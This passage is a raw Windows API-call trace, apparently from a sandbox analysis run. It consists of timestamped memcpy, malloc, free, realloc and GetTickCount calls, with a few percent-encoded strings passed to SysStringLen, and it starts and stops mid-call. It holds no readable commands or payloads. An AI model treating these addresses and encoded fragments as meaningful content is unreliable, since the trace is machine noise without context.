_Dst=0x24adf9bc9cc, _Src=0x24adf9bd0e8, _Size=0x4 | out: _Dst=0x24adf9bc9cc) returned 0x24adf9bc9cc [0100.897] memcpy (in: _Dst=0x24adf9bc9c8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc9c8) returned 0x24adf9bc9c8 [0100.898] free (_Block=0x24ae13af470) [0100.898] memcpy (in: _Dst=0x24adf9bcf48, _Src=0x24adf9bc9cc, _Size=0x4 | out: _Dst=0x24adf9bcf48) returned 0x24adf9bcf48 [0100.898] malloc (_Size=0x28) returned 0x24ae13af470 [0100.898] memcpy (in: _Dst=0x24adf9bd2a8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd2a8) returned 0x24adf9bd2a8 [0100.898] malloc (_Size=0x28) returned 0x24ae13af050 [0100.899] memcpy (in: _Dst=0x24adf9bc9fc, _Src=0x24adf9bd2a8, _Size=0x4 | out: _Dst=0x24adf9bc9fc) returned 0x24adf9bc9fc [0100.899] memcpy (in: _Dst=0x24adf9bc9f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc9f8) returned 0x24adf9bc9f8 [0100.899] free (_Block=0x24ae13af050) [0100.899] memcpy (in: _Dst=0x24adf9bd208, _Src=0x24adf9bc9fc, _Size=0x4 | out: _Dst=0x24adf9bd208) returned 0x24adf9bd208 [0100.899] malloc (_Size=0x28) returned 0x24ae13aef30 [0100.899] malloc (_Size=0x28) returned 0x24ae13af620 [0100.900] memcpy (in: _Dst=0x24adf9bcf88, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bcf88) returned 0x24adf9bcf88 [0100.900] malloc (_Size=0x28) returned 0x24ae13af3e0 [0100.900] memcpy (in: _Dst=0x24adf9bbafc, _Src=0x24adf9bcf88, _Size=0x4 | out: _Dst=0x24adf9bbafc) returned 0x24adf9bbafc [0100.900] memcpy (in: _Dst=0x24adf9bbaf8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbaf8) returned 0x24adf9bbaf8 [0100.900] free (_Block=0x24ae13af3e0) [0100.900] memcpy (in: _Dst=0x24adf9bcfc8, _Src=0x24adf9bbafc, _Size=0x4 | out: _Dst=0x24adf9bcfc8) returned 0x24adf9bcfc8 [0100.901] malloc (_Size=0x28) returned 0x24ae13af1a0 [0100.901] malloc (_Size=0x28) returned 0x24ae13af170 [0100.901] memcpy (in: _Dst=0x24adf9bd248, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd248) returned 0x24adf9bd248 [0100.901] malloc (_Size=0x28) returned 0x24ae13af350 [0100.901] memcpy (in: _Dst=0x24adf9bba3c, _Src=0x24adf9bd248, _Size=0x4 | out: _Dst=0x24adf9bba3c) returned 0x24adf9bba3c [0100.901] memcpy (in: _Dst=0x24adf9bba38, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bba38) returned 0x24adf9bba38 [0100.902] free (_Block=0x24ae13af350) [0100.902] memcpy (in: _Dst=0x24adf9bd028, _Src=0x24adf9bba3c, _Size=0x4 | out: _Dst=0x24adf9bd028) returned 0x24adf9bd028 [0100.902] malloc (_Size=0x28) returned 0x24ae13af140 [0100.902] malloc (_Size=0x28) returned 0x24ae13af3e0 [0100.902] GetTickCount () returned 0x210d374 [0100.902] memcpy (in: _Dst=0x24adf9bd2c8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd2c8) returned 0x24adf9bd2c8 [0100.902] malloc (_Size=0x28) returned 0x24ae13af440 [0100.902] memcpy (in: _Dst=0x24adf9bb85c, _Src=0x24adf9bd2c8, _Size=0x4 | out: _Dst=0x24adf9bb85c) returned 0x24adf9bb85c [0100.903] memcpy (in: _Dst=0x24adf9bb858, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb858) returned 0x24adf9bb858 [0100.903] free (_Block=0x24ae13af440) [0100.903] memcpy (in: _Dst=0x24adf9bd048, _Src=0x24adf9bb85c, _Size=0x4 | out: _Dst=0x24adf9bd048) returned 0x24adf9bd048 [0100.903] malloc (_Size=0x28) returned 0x24ae13af4d0 [0100.903] malloc (_Size=0x28) returned 0x24ae13af1d0 [0100.904] memcpy (in: _Dst=0x24adf9bd348, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bd348) returned 0x24adf9bd348 [0100.904] malloc (_Size=0x28) returned 0x24ae13af410 [0100.904] memcpy (in: _Dst=0x24adf9bba6c, _Src=0x24adf9bd348, _Size=0x4 | out: _Dst=0x24adf9bba6c) returned 0x24adf9bba6c [0100.904] memcpy (in: _Dst=0x24adf9bba68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bba68) returned 0x24adf9bba68 [0100.904] free (_Block=0x24ae13af410) [0100.905] memcpy (in: _Dst=0x24adf9bccc8, _Src=0x24adf9bba6c, _Size=0x4 | out: _Dst=0x24adf9bccc8) returned 0x24adf9bccc8 [0100.905] malloc (_Size=0x28) returned 0x24ae13af230 [0100.905] malloc (_Size=0x28) returned 0x24ae13af2f0 [0100.905] memcpy (in: _Dst=0x24adf9a59c8, _Src=0x24adf9bccc8, _Size=0x4 | out: _Dst=0x24adf9a59c8) returned 0x24adf9a59c8 [0100.905] memcpy (in: _Dst=0x24adf9a59c6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59c6) returned 0x24adf9a59c6 [0100.905] memcpy (in: _Dst=0x24adf9a59c2, _Src=0x24adf9bd048, _Size=0x4 | out: _Dst=0x24adf9a59c2) returned 0x24adf9a59c2 [0100.905] memcpy (in: _Dst=0x24adf9a59c0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59c0) returned 0x24adf9a59c0 [0100.905] memcpy (in: _Dst=0x24adf9a59bc, _Src=0x24adf9bd028, _Size=0x4 | out: _Dst=0x24adf9a59bc) returned 0x24adf9a59bc [0100.905] memcpy (in: _Dst=0x24adf9a59ba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59ba) returned 0x24adf9a59ba [0100.905] memcpy (in: _Dst=0x24adf9a59b6, _Src=0x24adf9bcfc8, _Size=0x4 | out: _Dst=0x24adf9a59b6) returned 0x24adf9a59b6 [0100.905] memcpy (in: _Dst=0x24adf9a59b4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59b4) returned 0x24adf9a59b4 [0100.905] memcpy (in: _Dst=0x24adf9a59b0, _Src=0x24adf9bd208, _Size=0x4 | out: _Dst=0x24adf9a59b0) returned 0x24adf9a59b0 [0100.905] memcpy (in: _Dst=0x24adf9a59ae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59ae) returned 0x24adf9a59ae [0100.905] memcpy (in: _Dst=0x24adf9a59aa, _Src=0x24adf9bcf48, _Size=0x4 | out: _Dst=0x24adf9a59aa) returned 0x24adf9a59aa [0100.905] memcpy (in: _Dst=0x24adf9a59a8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59a8) returned 0x24adf9a59a8 [0100.906] free (_Block=0x24ae13af2f0) [0100.906] SysStringLen (param_1="%44%c2%94%52%c2%b0") returned 0x12 [0100.906] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.907] memcpy (in: _Dst=0x24adf9bb8e8, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bb8e8) returned 0x24adf9bb8e8 [0100.907] free (_Block=0x24ae1480630) [0100.907] memcpy (in: _Dst=0x24adf9bcd28, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bcd28) returned 0x24adf9bcd28 [0100.907] malloc (_Size=0x28) returned 0x24ae13af110 [0100.907] memcpy (in: _Dst=0x24adf9bbb8e, _Src=0x24ae1a0f6cc, _Size=0xc | out: _Dst=0x24adf9bbb8e) returned 0x24adf9bbb8e [0100.907] memcpy (in: _Dst=0x24adf9bbb88, _Src=0x24adf9bcd28, _Size=0x6 | out: _Dst=0x24adf9bbb88) returned 0x24adf9bbb88 [0100.908] free (_Block=0x24ae13af110) [0100.908] malloc (_Size=0x70) returned 0x24ae146ff20 [0100.909] malloc (_Size=0x28) returned 0x24ae13af260 [0100.909] malloc (_Size=0x28) returned 0x24ae13af5c0 [0100.910] malloc (_Size=0x28) returned 0x24ae13af590 [0100.910] memcpy (in: _Dst=0x24adf9bb67e, _Src=0x24adf9bd448, _Size=0x2 | out: _Dst=0x24adf9bb67e) returned 0x24adf9bb67e [0100.910] memcpy (in: _Dst=0x24adf9bb67c, _Src=0x24adf9bd3e8, _Size=0x2 | out: _Dst=0x24adf9bb67c) returned 0x24adf9bb67c [0100.910] memcpy (in: _Dst=0x24adf9bb67a, _Src=0x24adf9bd368, _Size=0x2 | out: _Dst=0x24adf9bb67a) returned 0x24adf9bb67a [0100.910] memcpy (in: _Dst=0x24adf9bb678, _Src=0x24adf9bd0c8, _Size=0x2 | out: _Dst=0x24adf9bb678) returned 0x24adf9bb678 [0100.911] free (_Block=0x24ae13af590) [0100.911] memcpy (in: _Dst=0x24adf9b9528, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9528) returned 0x24adf9b9528 [0100.911] malloc (_Size=0x28) returned 0x24ae13aef60 [0100.911] memcpy (in: _Dst=0x24adf9bb49c, _Src=0x24adf9b9528, _Size=0x4 | out: _Dst=0x24adf9bb49c) returned 0x24adf9bb49c [0100.911] memcpy (in: _Dst=0x24adf9bb498, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb498) returned 0x24adf9bb498 [0100.912] free (_Block=0x24ae13aef60) [0100.912] memcpy (in: _Dst=0x24adf9b97c8, _Src=0x24adf9bb49c, _Size=0x4 | out: _Dst=0x24adf9b97c8) returned 0x24adf9b97c8 [0100.912] malloc (_Size=0x28) returned 0x24ae13af410 [0100.912] memcpy (in: _Dst=0x24adf9b9ba8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9ba8) returned 0x24adf9b9ba8 [0100.912] malloc (_Size=0x28) returned 0x24ae13af650 [0100.912] memcpy (in: _Dst=0x24adf9bbb2c, _Src=0x24adf9b9ba8, _Size=0x4 | out: _Dst=0x24adf9bbb2c) returned 0x24adf9bbb2c [0100.912] memcpy (in: _Dst=0x24adf9bbb28, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbb28) returned 0x24adf9bbb28 [0100.913] free (_Block=0x24ae13af650) [0100.913] memcpy (in: _Dst=0x24adf9b9b88, _Src=0x24adf9bbb2c, _Size=0x4 | out: _Dst=0x24adf9b9b88) returned 0x24adf9b9b88 [0100.913] malloc (_Size=0x28) returned 0x24ae13af650 [0100.913] malloc (_Size=0x28) returned 0x24ae13af290 [0100.913] memcpy (in: _Dst=0x24adf9b9948, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9948) returned 0x24adf9b9948 [0100.913] malloc (_Size=0x28) returned 0x24ae13af380 [0100.913] memcpy (in: _Dst=0x24adf9bb8bc, _Src=0x24adf9b9948, _Size=0x4 | out: _Dst=0x24adf9bb8bc) returned 0x24adf9bb8bc [0100.913] memcpy (in: _Dst=0x24adf9bb8b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb8b8) returned 0x24adf9bb8b8 [0100.913] free (_Block=0x24ae13af380) [0100.913] memcpy (in: _Dst=0x24adf9b9608, _Src=0x24adf9bb8bc, _Size=0x4 | out: _Dst=0x24adf9b9608) returned 0x24adf9b9608 [0100.913] malloc (_Size=0x28) returned 0x24ae13af500 [0100.913] malloc (_Size=0x28) returned 0x24ae13af680 [0100.914] memcpy (in: _Dst=0x24adf9b94c8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b94c8) returned 0x24adf9b94c8 [0100.914] malloc (_Size=0x28) returned 0x24ae13af440 [0100.914] memcpy (in: _Dst=0x24adf9bb5bc, _Src=0x24adf9b94c8, _Size=0x4 | out: _Dst=0x24adf9bb5bc) returned 0x24adf9bb5bc [0100.914] memcpy (in: _Dst=0x24adf9bb5b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb5b8) returned 0x24adf9bb5b8 [0100.914] free (_Block=0x24ae13af440) [0100.914] memcpy (in: _Dst=0x24adf9b96a8, _Src=0x24adf9bb5bc, _Size=0x4 | out: _Dst=0x24adf9b96a8) returned 0x24adf9b96a8 [0100.914] malloc (_Size=0x28) returned 0x24ae13aef60 [0100.914] malloc (_Size=0x28) returned 0x24ae13af110 [0100.914] GetTickCount () returned 0x210d384 [0100.914] memcpy (in: _Dst=0x24adf9a5ffc, _Src=0x24adf9b96a8, _Size=0x4 | out: _Dst=0x24adf9a5ffc) returned 0x24adf9a5ffc [0100.914] memcpy (in: _Dst=0x24adf9a5ffa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ffa) returned 0x24adf9a5ffa [0100.914] memcpy (in: _Dst=0x24adf9a5ff6, _Src=0x24adf9b9608, _Size=0x4 | out: _Dst=0x24adf9a5ff6) returned 0x24adf9a5ff6 [0100.914] memcpy (in: _Dst=0x24adf9a5ff4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ff4) returned 0x24adf9a5ff4 [0100.914] memcpy (in: _Dst=0x24adf9a5ff0, _Src=0x24adf9b9b88, _Size=0x4 | out: _Dst=0x24adf9a5ff0) returned 0x24adf9a5ff0 [0100.914] memcpy (in: _Dst=0x24adf9a5fee, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fee) returned 0x24adf9a5fee [0100.914] memcpy (in: _Dst=0x24adf9a5fea, _Src=0x24adf9b97c8, _Size=0x4 | out: _Dst=0x24adf9a5fea) returned 0x24adf9a5fea [0100.914] memcpy (in: _Dst=0x24adf9a5fe8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fe8) returned 0x24adf9a5fe8 [0100.915] free (_Block=0x24ae13af110) [0100.915] SysStringLen (param_1="%63%6f%6e%6f") returned 0xc [0100.915] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.915] memcpy (in: _Dst=0x24adf9bb588, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9bb588) returned 0x24adf9bb588 [0100.915] free (_Block=0x24ae1480630) [0100.915] malloc (_Size=0x2e0) returned 0x24ae1391850 [0100.915] malloc (_Size=0x20) returned 0x24ae13af440 [0100.915] malloc (_Size=0x288) returned 0x24ae148d5a0 [0100.916] GetTickCount () returned 0x210d384 [0100.916] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139d0f0 [0100.916] realloc (_Block=0x24ae13af440, _Size=0x40) returned 0x24ae146c320 [0100.916] realloc (_Block=0x24ae139d0f0, _Size=0x280) returned 0x24ae148e270 [0100.916] GetTickCount () returned 0x210d384 [0100.916] malloc (_Size=0x508) returned 0x24ae1486f10 [0100.916] GetTickCount () returned 0x210d384 [0100.916] realloc (_Block=0x24ae146c320, _Size=0x80) returned 0x24ae1480630 [0100.916] realloc (_Block=0x24ae148e270, _Size=0x500) returned 0x24ae1487930 [0100.916] GetTickCount () returned 0x210d384 [0100.916] GetTickCount () returned 0x210d384 [0100.916] malloc (_Size=0xa08) returned 0x24ae13af740 [0100.916] GetTickCount () returned 0x210d384 [0100.916] realloc (_Block=0x24ae1480630, _Size=0x100) returned 0x24ae1480630 [0100.916] GetTickCount () returned 0x210d384 [0100.916] realloc (_Block=0x24ae1487930, _Size=0xa00) returned 0x24ae13b0150 [0100.916] GetTickCount () returned 0x210d384 [0100.916] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] malloc (_Size=0x1408) returned 0x24ae1483320 [0100.917] GetTickCount () returned 0x210d384 [0100.917] realloc (_Block=0x24ae1480630, _Size=0x200) returned 0x24ae13ae3d0 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] realloc (_Block=0x24ae13b0150, _Size=0x1400) returned 0x24ae13a16e0 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.917] GetTickCount () returned 0x210d384 [0100.918] GetTickCount () returned 0x210d384 [0100.918] GetTickCount () returned 0x210d384 [0100.918] malloc (_Size=0x2808) returned 0x24ae13957b0 [0100.918] GetTickCount () returned 0x210d384 [0100.919] GetTickCount () returned 0x210d384 [0100.921] GetTickCount () returned 0x210d384 [0100.923] GetTickCount () returned 0x210d384 [0100.925] GetTickCount () returned 0x210d393 [0100.927] GetTickCount () returned 0x210d393 [0100.930] GetTickCount () returned 0x210d393 [0100.932] GetTickCount () returned 0x210d393 [0100.933] GetTickCount () returned 0x210d393 [0100.936] GetTickCount () returned 0x210d393 [0100.937] GetTickCount () returned 0x210d393 [0100.939] GetTickCount () returned 0x210d393 [0100.941] malloc (_Size=0x28) returned 0x24ae13af440 [0100.942] malloc (_Size=0x28) returned 0x24ae13aef90 [0100.942] GetTickCount () returned 0x210d3a3 [0100.942] malloc (_Size=0x28) returned 0x24ae13af2f0 [0100.942] memcpy (in: _Dst=0x24adf9bb64e, _Src=0x24adf9b9768, _Size=0x2 | out: _Dst=0x24adf9bb64e) returned 0x24adf9bb64e [0100.942] memcpy (in: _Dst=0x24adf9bb64c, _Src=0x24adf9b9468, _Size=0x2 | out: _Dst=0x24adf9bb64c) returned 0x24adf9bb64c [0100.942] memcpy (in: _Dst=0x24adf9bb64a, _Src=0x24adf9b9888, _Size=0x2 | out: _Dst=0x24adf9bb64a) returned 0x24adf9bb64a [0100.942] memcpy (in: _Dst=0x24adf9bb648, _Src=0x24adf9b9968, _Size=0x2 | out: _Dst=0x24adf9bb648) returned 0x24adf9bb648 [0100.943] free (_Block=0x24ae13af2f0) [0100.943] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x94", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.943] memcpy (in: _Dst=0x24adf9b9a48, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b9a48) returned 0x24adf9b9a48 [0100.943] malloc (_Size=0x28) returned 0x24ae13af080 [0100.943] memcpy (in: _Dst=0x24adf9bb6ae, _Src=0x24ae1a0f6cc, _Size=0xc | out: _Dst=0x24adf9bb6ae) returned 0x24adf9bb6ae [0100.943] memcpy (in: _Dst=0x24adf9bb6a8, _Src=0x24adf9b9a48, _Size=0x6 | out: _Dst=0x24adf9bb6a8) returned 0x24adf9bb6a8 [0100.943] free (_Block=0x24ae13af080) [0100.944] GetTickCount () returned 0x210d3a3 [0100.944] malloc (_Size=0x28) returned 0x24ae13af530 [0100.944] malloc (_Size=0x28) returned 0x24ae13af050 [0100.944] malloc (_Size=0x28) returned 0x24ae13aeff0 [0100.944] malloc (_Size=0x28) returned 0x24ae13af560 [0100.945] malloc (_Size=0x28) returned 0x24ae13af080 [0100.945] malloc (_Size=0x28) returned 0x24ae13af590 [0100.945] memcpy (in: _Dst=0x24adf9bb504, _Src=0x24adf9b9a08, _Size=0x2 | out: _Dst=0x24adf9bb504) returned 0x24adf9bb504 [0100.945] memcpy (in: _Dst=0x24adf9bb502, _Src=0x24adf9b9748, _Size=0x2 | out: _Dst=0x24adf9bb502) returned 0x24adf9bb502 [0100.945] memcpy (in: _Dst=0x24adf9bb500, _Src=0x24adf9b9788, _Size=0x2 | out: _Dst=0x24adf9bb500) returned 0x24adf9bb500 [0100.945] memcpy (in: _Dst=0x24adf9bb4fe, _Src=0x24adf9b95a8, _Size=0x2 | out: _Dst=0x24adf9bb4fe) returned 0x24adf9bb4fe [0100.945] memcpy (in: _Dst=0x24adf9bb4fc, _Src=0x24adf9b9648, _Size=0x2 | out: _Dst=0x24adf9bb4fc) returned 0x24adf9bb4fc [0100.945] memcpy (in: _Dst=0x24adf9bb4fa, _Src=0x24adf9b9448, _Size=0x2 | out: _Dst=0x24adf9bb4fa) returned 0x24adf9bb4fa [0100.945] memcpy (in: _Dst=0x24adf9bb4f8, _Src=0x24adf9b9548, _Size=0x2 | out: _Dst=0x24adf9bb4f8) returned 0x24adf9bb4f8 [0100.946] free (_Block=0x24ae13af590) [0100.946] memcpy (in: _Dst=0x24adf9b9a68, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9a68) returned 0x24adf9b9a68 [0100.946] malloc (_Size=0x28) returned 0x24ae13af110 [0100.946] memcpy (in: _Dst=0x24adf9bb6dc, _Src=0x24adf9b9a68, _Size=0x4 | out: _Dst=0x24adf9bb6dc) returned 0x24adf9bb6dc [0100.946] memcpy (in: _Dst=0x24adf9bb6d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb6d8) returned 0x24adf9bb6d8 [0100.946] free (_Block=0x24ae13af110) [0100.946] memcpy (in: _Dst=0x24adf9b9ae8, _Src=0x24adf9bb6dc, _Size=0x4 | out: _Dst=0x24adf9b9ae8) returned 0x24adf9b9ae8 [0100.946] malloc (_Size=0x28) returned 0x24ae13af380 [0100.947] memcpy (in: _Dst=0x24adf9b96e8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b96e8) returned 0x24adf9b96e8 [0100.947] malloc (_Size=0x28) returned 0x24ae13af590 [0100.947] memcpy (in: _Dst=0x24adf9bb94c, _Src=0x24adf9b96e8, _Size=0x4 | out: _Dst=0x24adf9bb94c) returned 0x24adf9bb94c [0100.947] memcpy (in: _Dst=0x24adf9bb948, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb948) returned 0x24adf9bb948 [0100.947] free (_Block=0x24ae13af590) [0100.947] memcpy (in: _Dst=0x24adf9b9668, _Src=0x24adf9bb94c, _Size=0x4 | out: _Dst=0x24adf9b9668) returned 0x24adf9b9668 [0100.947] malloc (_Size=0x28) returned 0x24ae13af2f0 [0100.947] malloc (_Size=0x28) returned 0x24ae13af110 [0100.948] GetTickCount () returned 0x210d3a3 [0100.948] memcpy (in: _Dst=0x24adf9b97e8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b97e8) returned 0x24adf9b97e8 [0100.948] malloc (_Size=0x28) returned 0x24ae13af320 [0100.948] memcpy (in: _Dst=0x24adf9bb70c, _Src=0x24adf9b97e8, _Size=0x4 | out: _Dst=0x24adf9bb70c) returned 0x24adf9bb70c [0100.948] memcpy (in: _Dst=0x24adf9bb708, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb708) returned 0x24adf9bb708 [0100.948] free (_Block=0x24ae13af320) [0100.949] memcpy (in: _Dst=0x24adf9b9928, _Src=0x24adf9bb70c, _Size=0x4 | out: _Dst=0x24adf9b9928) returned 0x24adf9b9928 [0100.949] malloc (_Size=0x28) returned 0x24ae13af320 [0100.949] malloc (_Size=0x28) returned 0x24ae13af350 [0100.949] memcpy (in: _Dst=0x24adf9b9a88, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9a88) returned 0x24adf9b9a88 [0100.949] malloc (_Size=0x28) returned 0x24ae13af590 [0100.949] memcpy (in: _Dst=0x24adf9bb88c, _Src=0x24adf9b9a88, _Size=0x4 | out: _Dst=0x24adf9bb88c) returned 0x24adf9bb88c [0100.949] memcpy (in: _Dst=0x24adf9bb888, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb888) returned 0x24adf9bb888 [0100.949] free (_Block=0x24ae13af590) [0100.950] memcpy (in: _Dst=0x24adf9b9728, _Src=0x24adf9bb88c, _Size=0x4 | out: _Dst=0x24adf9b9728) returned 0x24adf9b9728 [0100.950] malloc (_Size=0x28) returned 0x24ae13af3b0 [0100.950] malloc (_Size=0x28) returned 0x24ae13af590 [0100.950] memcpy (in: _Dst=0x24adf9b95c8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b95c8) returned 0x24adf9b95c8 [0100.950] malloc (_Size=0x28) returned 0x24ae14808c0 [0100.950] memcpy (in: _Dst=0x24adf9bb76c, _Src=0x24adf9b95c8, _Size=0x4 | out: _Dst=0x24adf9bb76c) returned 0x24adf9bb76c [0100.950] memcpy (in: _Dst=0x24adf9bb768, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb768) returned 0x24adf9bb768 [0100.950] free (_Block=0x24ae14808c0) [0100.951] memcpy (in: _Dst=0x24adf9b95e8, _Src=0x24adf9bb76c, _Size=0x4 | out: _Dst=0x24adf9b95e8) returned 0x24adf9b95e8 [0100.951] malloc (_Size=0x28) returned 0x24ae1480b00 [0100.951] malloc (_Size=0x28) returned 0x24ae14809b0 [0100.951] memcpy (in: _Dst=0x24adf9b9828, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9828) returned 0x24adf9b9828 [0100.951] malloc (_Size=0x28) returned 0x24ae1480920 [0100.951] memcpy (in: _Dst=0x24adf9bb97c, _Src=0x24adf9b9828, _Size=0x4 | out: _Dst=0x24adf9bb97c) returned 0x24adf9bb97c [0100.951] memcpy (in: _Dst=0x24adf9bb978, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb978) returned 0x24adf9bb978 [0100.951] free (_Block=0x24ae1480920) [0100.951] memcpy (in: _Dst=0x24adf9b9848, _Src=0x24adf9bb97c, _Size=0x4 | out: _Dst=0x24adf9b9848) returned 0x24adf9b9848 [0100.951] malloc (_Size=0x28) returned 0x24ae1480ad0 [0100.952] malloc (_Size=0x28) returned 0x24ae14809e0 [0100.952] memcpy (in: _Dst=0x24adf9b9688, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9688) returned 0x24adf9b9688 [0100.952] malloc (_Size=0x28) returned 0x24ae1480800 [0100.952] memcpy (in: _Dst=0x24adf9bb79c, _Src=0x24adf9b9688, _Size=0x4 | out: _Dst=0x24adf9bb79c) returned 0x24adf9bb79c [0100.952] memcpy (in: _Dst=0x24adf9bb798, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb798) returned 0x24adf9bb798 [0100.952] free (_Block=0x24ae1480800) [0100.952] memcpy (in: _Dst=0x24adf9b98a8, _Src=0x24adf9bb79c, _Size=0x4 | out: _Dst=0x24adf9b98a8) returned 0x24adf9b98a8 [0100.952] malloc (_Size=0x28) returned 0x24ae1480920 [0100.952] malloc (_Size=0x28) returned 0x24ae1480950 [0100.953] memcpy (in: _Dst=0x24adf9ad2be, _Src=0x24adf9b98a8, _Size=0x4 | out: _Dst=0x24adf9ad2be) returned 0x24adf9ad2be [0100.953] memcpy (in: _Dst=0x24adf9ad2bc, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad2bc) returned 0x24adf9ad2bc [0100.953] memcpy (in: _Dst=0x24adf9ad2b8, _Src=0x24adf9b9848, _Size=0x4 | out: _Dst=0x24adf9ad2b8) returned 0x24adf9ad2b8 [0100.953] memcpy (in: _Dst=0x24adf9ad2b6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad2b6) returned 0x24adf9ad2b6 [0100.953] memcpy (in: _Dst=0x24adf9ad2b2, _Src=0x24adf9b95e8, _Size=0x4 | out: _Dst=0x24adf9ad2b2) returned 0x24adf9ad2b2 [0100.953] memcpy (in: _Dst=0x24adf9ad2b0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad2b0) returned 0x24adf9ad2b0 [0100.953] memcpy (in: _Dst=0x24adf9ad2ac, _Src=0x24adf9b9728, _Size=0x4 | out: _Dst=0x24adf9ad2ac) returned 0x24adf9ad2ac [0100.953] memcpy (in: _Dst=0x24adf9ad2aa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad2aa) returned 0x24adf9ad2aa [0100.953] memcpy (in: _Dst=0x24adf9ad2a6, _Src=0x24adf9b9928, _Size=0x4 | out: _Dst=0x24adf9ad2a6) returned 0x24adf9ad2a6 [0100.953] memcpy (in: _Dst=0x24adf9ad2a4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad2a4) returned 0x24adf9ad2a4 [0100.953] memcpy (in: _Dst=0x24adf9ad2a0, _Src=0x24adf9b9668, _Size=0x4 | out: _Dst=0x24adf9ad2a0) returned 0x24adf9ad2a0 [0100.953] memcpy (in: _Dst=0x24adf9ad29e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad29e) returned 0x24adf9ad29e [0100.953] memcpy (in: _Dst=0x24adf9ad29a, _Src=0x24adf9b9ae8, _Size=0x4 | out: _Dst=0x24adf9ad29a) returned 0x24adf9ad29a [0100.953] memcpy (in: _Dst=0x24adf9ad298, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad298) returned 0x24adf9ad298 [0100.953] free (_Block=0x24ae1480950) [0100.953] SysStringLen (param_1="%c3%ac%5e%c2%b2%c3%a1") returned 0x15 [0100.954] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0100.954] memcpy (in: _Dst=0x24adf9bbac8, _Src=0x24ae13ae5e0, _Size=0x8 | out: _Dst=0x24adf9bbac8) returned 0x24adf9bbac8 [0100.954] free (_Block=0x24ae13ae5e0) [0100.954] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.954] memcpy (in: _Dst=0x24adf9b9488, _Src=0xd6788fbb30, _Size=0x2 | out: 